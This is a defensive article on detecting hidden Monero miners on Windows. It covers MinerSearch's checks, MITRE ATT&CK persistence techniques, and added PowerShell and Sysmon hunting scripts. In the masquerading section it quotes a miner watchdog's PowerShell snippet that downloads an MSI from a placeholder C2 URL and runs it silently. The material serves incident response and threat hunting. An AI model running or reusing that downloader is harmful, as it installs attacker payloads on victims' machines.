MinerSearch: Miner detection in Windows - from manual analysis to automatic removal

Depov

Business logic of hidden mining: why the miner is an intruder
A hidden miner is one of the “quiet” threats. Unlike ransomware, which announces itself, a cryptominer generates a stable passive income for months. The scheme is simple: infect as many machines as possible, mine Monero (XMR) through pools, keep the noise to a minimum.

The financial impact on the victim is far from symbolic. On servers: growing electricity bills and SLA degradation. On terminal servers: user complaints about sluggishness. On workstations: accelerated wear of GPUs and power supplies. Some families (for example, Smominru) combine mining with DDoS and proxy traffic, turning the machine into part of a botnet's infrastructure.

A typical kill chain of a hidden miner on Windows:
1. Initial Access - phishing, pirated software, exploitation of vulnerabilities in a public service (Exploit Public-Facing Application, T1190)
2. Execution - launching the downloader via PowerShell, cmd or Windows Installer (MSI)
3. Persistence - creating a service, a Task Scheduler task (Scheduled Task, T1053.005), entries in the registry Run keys
4. Defense Evasion - masquerading as a system process (Masquerading, T1036), obfuscation (Deobfuscate/Decode Files or Information, T1140), injection into svchost.exe
5. Discovery - searching for competing miners via network connections (System Network Connections Discovery, T1049)
6. Impact - launching XMRig / lolMiner and connecting to the pool
MinerSearch works at stages 3-5: it checks persistence traces, looks for masqueraded processes and files, and analyzes startup points.
How a hidden miner persists in Windows: MITRE ATT&CK
Masquerading as system processes (T1036)
The most common technique is renaming the miner binary to svchost.exe, conhost.exe or csrss.exe and placing it in a non-standard directory. The real svchost.exe runs only from C:\Windows\System32\, and its parent process is services.exe. Any deviation is a red flag.

[Applicable to: Windows 10/11, internal pentest / IR]

According to Trend Micro, the Coinminer.Win32.MALXMR family uses Windows Installer (MSI) for delivery and places its files in %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server. After installation, three svchost.exe processes are created for injecting the malicious code: two act as watchdogs (restarting the miner when it terminates), the third does the mining. This complicates removal: you kill one process, and the watchdog brings it back within seconds.

The LOLBAS catalog lists several legitimate Windows utilities suitable for masquerading, for example Diantz.exe and Makecab.exe (both tagged with T1036). Atomic Red Team has a ready-made test, “System File Copied to Unusual Location” (PowerShell, Windows): it copies a system file to a non-standard directory, reproducing exactly the behavior MinerSearch looks for when scanning the file system.

D3FEND: File Analysis (D3-FA), File Integrity Monitoring (D3-FIM) and Dynamic Analysis (D3-DA) are all aimed at detecting executable camouflage.
Deobfuscation and payload delivery (T1140)
Miners are delivered in encoded form. For decoding, certutil.exe -decode is often used: a built-in Windows utility for working with certificates, listed in the LOLBAS catalog as a tool for Deobfuscate/Decode Files or Information (T1140). In the case of Coinminer.Win32.MALXMR the payload was a ZIP archive disguised as an icon file (icon.ico); inside were the loader (default.ocx) and the encrypted mining module (default.bin).

The watchdog processes use PowerShell to re-download the MSI file when the miner terminates:
Code:

$cli = New-Object System.Net.WebClient
$cli.Headers['User-Agent'] = 'Windows Installer'
$f = "$env:TEMP\payload.msi"
$cli.DownloadFile('https://<C2-server>/update.txt', $f)
Start-Process $f -ArgumentList '/q'
This pattern can be detected with the Sigma rule proc_creation_win_powershell_base64_frombase64string.yml from SigmaHQ, which catches the use of FromBase64String in PowerShell arguments. The rule proc_creation_win_certutil_susp_execution.yml catches suspicious certutil invocations.
Persistence: services and the Task Scheduler
[Applicable to: Windows 10/11, IR / threat hunting]

On Windows, miners persist through three main vectors:
• Scheduled Tasks (T1053.005) - tasks whose action launches a binary from a non-standard path (%TEMP%, %AppData%)
• Windows Services - registration of a service without a valid digital signature
• Registry Run keys - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and similar branches
MinerSearch checks all three vectors. For services it verifies the digital signature: if the signature is missing or invalid, the service is marked as suspicious. There is a nuance: rare legitimate services are also unsigned. That is why MinerSearch splits results into “deleted” (confirmed by signature) and “quarantined” (suspicious), so that false positives can be restored.
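The three persistence vectors above can be enumerated by hand before any tool is run. The script below is an added example written for this post; it is not MinerSearch's code and does not reproduce its signature base. It assumes an elevated PowerShell 5.1+ session on Windows 10/11, treats anything under %SystemRoot% and the Program Files directories as an expected location, and only reports findings: nothing is stopped, deleted or quarantined, so an unsigned but legitimate corporate service is never touched automatically. The helper Get-ImagePathFromCommand and the list of Run keys are the author's choices, not part of the tool.

```powershell
# Added example, not code from the original post or from MinerSearch.
# Assumes: elevated PowerShell 5.1+ on Windows 10/11. Findings are reported only.
$expectedRoots = @($env:SystemRoot, ${env:ProgramFiles}, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Get-ImagePathFromCommand {
    # Service ImagePath and Run values look like  "C:\x\y.exe" -arg  or  C:\x\y.exe -arg
    # Returns just the executable path (environment variables expanded).
    param([string]$Command)
    if (-not $Command) { return $null }
    $c = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        if ($end -gt 1) { return $c.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($c, '^(.+?\.(exe|dll|bat|cmd|ps1|vbs|js))(\s|$)', 'IgnoreCase')
    $exe = if ($m.Success) { $m.Groups[1].Value } else { ($c -split '\s+')[0] }
    if ($exe -notmatch '[\\/]') {
        # bare names such as powershell.exe are resolved through PATH
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue | Select-Object -First 1
        if ($cmd -and $cmd.Source) { return $cmd.Source }
    }
    return $exe
}

function Test-ExpectedPath {
    param([string]$Path)
    foreach ($root in $expectedRoots) {
        if ($Path -and $Path.StartsWith($root, 'OrdinalIgnoreCase')) { return $true }
    }
    return $false
}

function Get-SuspiciousScheduledTasks {
    # Vector 1: tasks whose exec action points outside the expected roots
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }      # COM-handler actions have no Execute
            $exe = Get-ImagePathFromCommand $a.Execute
            if (-not (Test-ExpectedPath $exe)) {
                [pscustomobject]@{ Vector = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; Image = $exe; Detail = $a.Arguments }
            }
        }
    }
}

function Get-UnsignedServices {
    # Vector 2: services whose binary has no valid Authenticode signature or sits in an odd place.
    # Catalog-signed Windows binaries report 'Valid' on Windows 10/11; anything else is reviewed, not removed.
    Get-CimInstance Win32_Service | ForEach-Object {
        $exe = Get-ImagePathFromCommand $_.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) {
            [pscustomobject]@{ Vector = 'Service'; Name = $_.Name; Image = $_.PathName; Detail = 'binary not found' }
            return   # acts as "continue" inside ForEach-Object
        }
        $sig = Get-AuthenticodeSignature -LiteralPath $exe
        if ($sig.Status -ne 'Valid' -or -not (Test-ExpectedPath $exe)) {
            [pscustomobject]@{ Vector = 'Service'; Name = $_.Name; Image = $exe; Detail = "signature=$($sig.Status)" }
        }
    }
}

function Get-RunKeyEntries {
    # Vector 3: Run/RunOnce keys. HKCU is the hive of the account running this script,
    # so from an admin prompt the victim user's own HKCU may need a separate pass.
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in ($props.PSObject.Properties.Name | Where-Object { $_ -notin $meta })) {
            $exe = Get-ImagePathFromCommand $props.$name
            if (-not (Test-ExpectedPath $exe)) {
                [pscustomobject]@{ Vector = 'RunKey'; Name = "$key\$name"; Image = $exe; Detail = $props.$name }
            }
        }
    }
}

$findings = @(Get-SuspiciousScheduledTasks) + @(Get-UnsignedServices) + @(Get-RunKeyEntries)
$findings | Format-Table -AutoSize
```

Everything the script prints is a candidate for review, which mirrors the "quarantine" half of MinerSearch's split: the signature status and the path are shown side by side so that an unsigned vendor service in C:\Program Files can be told apart from an unsigned binary in %AppData% before anyone decides to stop or delete it.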

Cryptominers on Linux use different persistence mechanisms, in particular cron jobs. The T1053.003 (Cron) technique applies exclusively to Linux/macOS. Red Canary's study of the Rocke group shows how the attackers place scripts in /etc/cron.hourly/ and /etc/cron.daily/ and edit crontab files directly. MinerSearch is not applicable to Linux; it is a Windows-only tool.
MinerSearch: tool architecture and what it checks

Environment requirements
• OS: Windows 10 / Windows 11 (Windows 7/8 - with restrictions)
• .NET Framework: version 4.7.1 or newer (preinstalled in Windows 10/11)
• Privileges: must be run as administrator
• Mode: normal Windows boot (NOT Safe Mode)
• RAM: runs on machines with 2 GB and up, no additional resources required
• Antivirus: Microsoft Defender, Kaspersky Endpoint Security and others may block MinerSearch, since the utility modifies the registry and file system. Solution: temporarily add it to the exclusions (after analysis)
• Network: not required - the scan is completely offline
Scanning stages - what happens under the hood
1. Rootkit check. Searches for kernel-level rootkits capable of hiding processes from Task Manager. If a rootkit sits in the system, all other checks are meaningless: the miner simply will not be visible.
2. Analysis of running processes. Checks active processes for masquerading: a mismatch between the name and the path to the binary, launch from uncharacteristic directories. Suspicious processes are forcibly terminated.
3. File system scan. Walks the typical directories where miners are placed: %TEMP%, %AppData%, C:\ProgramData. Files are compared with the signatures of XMRig, lolMiner, PhoenixMiner and other well-known miners.
4. Registry analysis. Checks Run keys and other startup points.
5. Task Scheduler check. Searches for tasks whose path to the binary points to non-standard directories.
6. Service inspection. Verifies digital signatures. Without a valid signature the service is marked as suspicious.
7. Signature scan. A full pass over the executable files on the system disk.
The result of each stage is displayed in the console: “No threats found” or “Found threats: N”. The detailed log is stored in C:\_MinerSearch_Logs\.
Flags for targeted checks
A blue team often needs to run a scan without automatic remediation: first study the report, then make a decision. MinerSearch supports granular control via flags: --no-rootkit-check, --no-runtime, --no-services, --no-signature-scan. They can be combined in any order; case does not matter.

Files identified as suspicious (but not confirmed by signatures) are placed in the minersearch_quarantine folder next to the executable. Malicious files (confirmed by signature) are deleted without prompting. After the scan completes, be sure to check the quarantine: legitimate unsigned software can end up there.
Manual cryptominer detection: step-by-step checklist
MinerSearch is a good first step, but an experienced analyst needs to be able to find a miner by hand. The algorithm below does not depend on a specific tool.

Step 1: Process analysis. Open Process Explorer (Sysinternals) and sort by CPU. Look for: processes at >50% CPU for no apparent reason, svchost.exe whose parent is not services.exe, executables running from %TEMP% and %AppData%, processes with an empty Company Name field. Quick check in PowerShell:
Code:

# svchost.exe instances running from anywhere other than System32
Get-Process svchost -ErrorAction SilentlyContinue |
Where-Object {$_.Path -notlike "*System32*"} |
Select-Object Id, Path, CPU

# established connections to ports typically used by mining pools
Get-NetTCPConnection -State Established |
Where-Object {$_.RemotePort -in 3333,4444,5555,14444,14433} |
Select-Object OwningProcess, RemoteAddress, RemotePort
If the first command returns a non-empty result, that is an anomaly: the legitimate svchost.exe runs only from C:\Windows\System32\. If the second one finds a connection, identify the PID via Get-Process -Id <PID> | Select-Object Path and check the binary.
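The two one-liners above check the path and the port separately; the masquerading section earlier also names the parent process (services.exe) as a signal, and Get-Process does not expose it. The script below is an added example for this post, not MinerSearch's code or the post's own commands: it joins both checks, adds the parent-process test via Win32_Process, and attaches the owning binary's path and Authenticode status to every pool-port connection so the analyst gets the "check the binary" step in the same output. It assumes an elevated session on Windows 10/11 and uses the post's pool-port list as a heuristic, not a signature.

```powershell
# Added example, not code from the original post or from MinerSearch.
# Assumes: elevated PowerShell on Windows 10/11; legitimate svchost.exe lives in
# %SystemRoot%\System32 and is started by services.exe.
$poolPorts = 3333, 4444, 5555, 14444, 14433      # heuristic list taken from the post
$system32  = Join-Path $env:SystemRoot 'System32'

function Get-MasqueradingSvchost {
    # Win32_Process exposes ParentProcessId, which Get-Process does not on Windows PowerShell 5.1
    $procs = Get-CimInstance Win32_Process
    $byId  = @{}
    foreach ($p in $procs) { $byId[[int]$p.ProcessId] = $p }

    foreach ($p in ($procs | Where-Object { $_.Name -ieq 'svchost.exe' })) {
        $parent     = $byId[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Name } else { '<exited>' }
        $reasons    = @()
        if (-not $p.ExecutablePath) {
            $reasons += 'path not readable (verify in Process Explorer)'
        } elseif (-not $p.ExecutablePath.StartsWith($system32, 'OrdinalIgnoreCase')) {
            $reasons += 'path outside System32'
        }
        if ($parentName -ine 'services.exe') { $reasons += 'parent is not services.exe' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Pid    = $p.ProcessId
                Path   = $p.ExecutablePath
                Parent = "$parentName ($($p.ParentProcessId))"
                Reason = $reasons -join '; '
            }
        }
    }
}

function Get-PoolPortConnections {
    # Established connections to pool ports, joined with the owning process and its signature status
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $_.RemotePort -in $poolPorts } |
        ForEach-Object {
            $owner = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            $path  = if ($owner) { $owner.Path } else { $null }
            [pscustomobject]@{
                Pid       = $_.OwningProcess
                Process   = if ($owner) { $owner.ProcessName } else { '<exited>' }
                Path      = $path
                Remote    = "$($_.RemoteAddress):$($_.RemotePort)"
                Signature = if ($path) { (Get-AuthenticodeSignature -LiteralPath $path).Status } else { 'n/a' }
            }
        }
}

Get-MasqueradingSvchost | Format-Table -AutoSize
Get-PoolPortConnections | Format-Table -AutoSize
```

An empty table from both functions is the expected state on a clean host. A svchost.exe with a valid path but a parent other than services.exe is still worth a look, because the parent check is what catches a renamed binary that was dropped into System32 itself.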

Step 2: Autostart check. Launch Autoruns (Sysinternals) and look for: entries without a digital signature (highlighted in yellow), scheduler tasks whose binary path lies outside C:\Windows\ and C:\Program Files\, services with an ImagePath in non-standard directories.

Step 3: Sysmon and the Windows Event Log. If Sysmon is installed (and for a SOC it is a must-have), check three event types. Event ID 1 (Process Create): look for processes from temporary directories with arguments containing --config, --url, stratum+tcp://. Event ID 3 (Network Connection): connections to pool ports (3333, 4444, 5555). Event ID 7 (Image Loaded): DLLs loaded into svchost.exe from non-standard paths.

Without Sysmon, analysis is very limited: the standard Windows logs do not record process command lines and network connections in sufficient detail. SigmaHQ has ready-made detection rules: posh_pm_susp_get_nettcpconnection.yml monitors suspicious calls to Get-NetTCPConnection, and proc_creation_win_net_use_network_connections_discovery.yml tracks reconnaissance of network connections.
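The three Sysmon checks from Step 3 can be run from the event log directly. The script below is an added example for this post, not code from the original or from MinerSearch: it reads the last 30 days of the Sysmon channel, flattens each event's EventData into a hashtable, and applies the post's three criteria (miner-style command lines or images in temp directories for Event ID 1, pool ports for Event ID 3, and non-Windows DLLs loaded into svchost.exe for Event ID 7). The regular expressions and the 30-day window are the author's assumptions; Event IDs 3 and 7 only exist in the log if the Sysmon configuration enables them.

```powershell
# Added example, not code from the original post or from MinerSearch.
# Assumes: Sysmon installed with its default channel name; the session can read it
# (Administrators or Event Log Readers). Patterns are heuristics taken from the post.
$sysmonLog  = 'Microsoft-Windows-Sysmon/Operational'
$since      = (Get-Date).AddDays(-30)
$poolPorts  = 3333, 4444, 5555, 14444, 14433
$cmdPattern = 'stratum\+(tcp|ssl)://|--url[=\s]|--config[=\s]|--donate-level'
$suspImage  = '\\AppData\\(Local\\Temp|Roaming)\\|\\ProgramData\\|\\Windows\\Temp\\|\\Users\\Public\\'

function Get-SysmonEvents {
    param([int[]]$Ids)
    Get-WinEvent -FilterHashtable @{ LogName = $sysmonLog; Id = $Ids; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Sysmon stores its fields as <Data Name="..."> elements; turn them into a hashtable
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            $d['Id']   = $_.Id
            $d['Time'] = $_.TimeCreated
            $d
        }
}

function Find-MinerProcessCreates {
    # Event ID 1: miner-style arguments, or an executable started from a temp/AppData location
    Get-SysmonEvents -Ids 1 | Where-Object {
        ($_.CommandLine -match $cmdPattern) -or ($_.Image -match $suspImage)
    } | ForEach-Object {
        [pscustomobject]@{ Time = $_.Time; Event = 'ProcessCreate'; Pid = $_.ProcessId; Image = $_.Image; Detail = $_.CommandLine }
    }
}

function Find-PoolConnections {
    # Event ID 3: outbound connections to the pool-port list (requires NetworkConnect enabled in the config)
    Get-SysmonEvents -Ids 3 | Where-Object { [int]$_.DestinationPort -in $poolPorts } | ForEach-Object {
        [pscustomobject]@{ Time = $_.Time; Event = 'NetworkConnect'; Pid = $_.ProcessId; Image = $_.Image; Detail = "$($_.DestinationIp):$($_.DestinationPort)" }
    }
}

function Find-SvchostUnusualImageLoads {
    # Event ID 7: DLLs loaded into svchost.exe from outside the Windows directory
    # (requires ImageLoad enabled in the config; third-party shims may also show up here)
    Get-SysmonEvents -Ids 7 | Where-Object {
        $_.Image -match '\\svchost\.exe$' -and $_.ImageLoaded -notmatch '^[A-Za-z]:\\Windows\\'
    } | ForEach-Object {
        [pscustomobject]@{ Time = $_.Time; Event = 'ImageLoaded'; Pid = $_.ProcessId; Image = $_.Image; Detail = $_.ImageLoaded }
    }
}

$hits = @(Find-MinerProcessCreates) + @(Find-PoolConnections) + @(Find-SvchostUnusualImageLoads)
# Sorted by time: the earliest hit is the best estimate of when the infection started
$hits | Sort-Object Time | Format-Table -AutoSize
```

Sorting the combined results by time is what turns three separate checks into a timeline: the first Process Create hit usually marks the initial drop, the first Network Connect marks when mining actually began, and Image Loaded events in between show whether a legitimate svchost.exe was hollowed or a renamed copy was used.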

Step 4: Re-check after reboot. If the miner was found and removed, reboot the machine and repeat steps 1-2. Watchdog mechanisms can restore the miner from a backup copy or re-download it from the C2 server.
MinerSearch limitations and when it is not enough
1. Windows only. Linux servers, where cryptominers are also common (especially via vulnerabilities in Redis, WebLogic, Apache Struts - Exploit Public-Facing Application, T1190), are not covered by MinerSearch. Linux needs other tools: rkhunter, chkrootkit, manual analysis of cron jobs and /proc.
2. The signature base is limited. New or modified miner variants that are not in the database can slip through. MinerSearch complements the signature approach with behavioral checks (paths, signatures, rootkits), but does not replace a full EDR. For enterprise-level cryptominer detection there are ML approaches: for example, Sysdig describes a classification model based on runtime syscall analysis with an emphasis on minimizing false positives.
3. False positives. Corporate services without a digital signature may be stopped. Always study the log and check the quarantine before use in production.
4. Does not detect web miners. Cryptojacking via JavaScript (the former CoinHive and its analogues) is outside MinerSearch's scope.
5. It does not scale. It is a single-machine utility. To check a fleet of hosts you need Velociraptor, SCCM with custom scripts, or an EDR with detection rules.
6. Antivirus may block MinerSearch. On an infected machine the miner itself may additionally block the download of security tools; according to remontka.pro, in that case AV Block Remover or booting from Kaspersky Rescue Disk helps.
How MinerSearch is different from antivirus scanners

When to use MinerSearch: a cryptominer is suspected, the antivirus cannot cope, and a deep check of persistence mechanisms (registry, services, scheduler) is needed.

When MinerSearch is not enough: infection with complex malware (ransomware + miner), dozens of hosts to check, a Linux environment, or ML detection of unknown families is required.
Ready-made SOC checklist: hunting a hidden miner
Numbered list for inclusion in an IR playbook:
1. Check CPU/GPU load in Task Manager - an anomaly is >50% while idle
2. Run a masquerading check: Get-Process svchost | Where-Object {$_.Path -notlike "*System32*"}
3. Check network connections to pools on ports 3333, 4444, 5555, 1444
4. Run Autoruns - check startup entries, unsigned services, scheduler tasks
5. Download MinerSearch from GitHub (BlendLog/MinerSearch), run as administrator
6. Study the log in C:\_MinerSearch_Logs\ - entries marked "Found threats"
7. Check the minersearch_quarantine folder - to rule out false positives
8. Reboot the machine and repeat steps 1-3 - to make sure the watchdog did not restore the miner
9. Check Sysmon (Event ID 1, 3, 7) for the last 30 days - to determine the moment of initial infection
10. Run KVRT or Dr.Web CureIt! to look for related malware
 